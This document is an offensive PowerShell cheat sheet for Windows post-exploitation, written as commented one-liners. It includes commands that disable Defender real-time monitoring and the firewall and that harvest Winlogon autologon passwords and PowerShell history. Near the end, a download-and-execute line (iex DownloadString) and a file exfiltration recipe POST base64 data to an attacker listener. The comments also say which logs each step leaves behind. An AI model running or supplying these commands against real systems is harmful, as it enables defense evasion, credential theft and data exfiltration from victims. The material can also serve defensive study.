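% powershell
# Show whether PowerShell ConstrainedLanguage mode is on (FullLanguage = unrestricted; ConstrainedLanguage blocks most .NET method calls and Add-Type)
$ExecutionContext.SessionState.LanguageMode
# Show the effective AppLocker policy for this host (no output = no AppLocker rules apply)
Get-AppLockerPolicy -Effective
# Show whether Device Guard / WDAC code integrity is enforced (check UsermodeCodeIntegrityPolicyEnforcementStatus: 0 off, 1 audit, 2 enforced)
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
# Windows Defender excluded paths (files written here are not scanned by real-time protection)
(Get-MpPreference).ExclusionPath
# Disable Windows Defender real-time monitoring (needs admin; silently ineffective when Tamper Protection is on; logged as Defender event 5001)
Set-MpPreference -DisableRealtimeMonitoring $true
# PS remoting: build a PSCredential and open a session (the password lands in PSReadLine history and script-block logs, event 4104; prefer Get-Credential when interactive)
$pass = ConvertTo-SecureString '<pass>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<user>', $pass)
$session = New-PSSession -ComputerName <target> -Credential $cred
# PSSESSION: print an interactive-session recipe to run locally (Negotiate picks Kerberos and falls back to NTLM)
echo '$cred = Get-Credential'
echo 'Enter-PSSession -ComputerName <TARGET> -Authentication Negotiate -Credential $cred'
# Invoke-Command on a remote computer via an existing PS Remoting session (e.g. $session from New-PSSession)
Invoke-Command -ScriptBlock{hostname;whoami;Get-LocalGroupMember -Group Administrators} -Session <session>
# Search scheduled tasks whose action arguments match a regex and print the matching actions
(Get-ScheduledTask | ?{$_.Actions.Arguments -match "<argumentpattern>"} ).Actions
# Registry: read Winlogon autologon credentials (DefaultPassword is cleartext when AutoAdminLogon is set; missing values print empty instead of erroring)
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | Select-Object AutoAdminLogon, DefaultDomainName, DefaultUserName, DefaultPassword
# Get PSReadLine options incl. HistorySavePath (ConsoleHost_history.txt keeps every command typed by the user, credentials included)
Get-PSReadlineOption
# MSSQL query via PowerShell (needs the SqlServer module; -Password is plaintext in argv and history, drop -Username/-Password for integrated auth)
Invoke-Sqlcmd -ServerInstance <server> -Query '<query>' -Username <user> -Password <pass>
# Disable the Windows firewall on all profiles (needs admin; the policy change is logged by the firewall service)
Set-NetFirewallProfile -Name Domain,Private,Public -Enabled False
# Download and run a script in memory (outer double quotes so the inner '' survive both bash and PowerShell echo; iex is inspected by AMSI and script-block logging 4104)
echo "iex (New-Object Net.WebClient).DownloadString('<URL>')"
# Convert a file to base64 and POST it to an attacker listener (e.g. nc -lvnp 80); ReadAllBytes works on PowerShell 5.1 and 7, whereas -Encoding Byte is 5.1-only
echo '$Base64String = [System.Convert]::ToBase64String([IO.File]::ReadAllBytes("c:/<PATH>"))'
echo 'Invoke-WebRequest -Uri http://<ATTACKIP> -Method POST -Body $Base64String -UseBasicParsing'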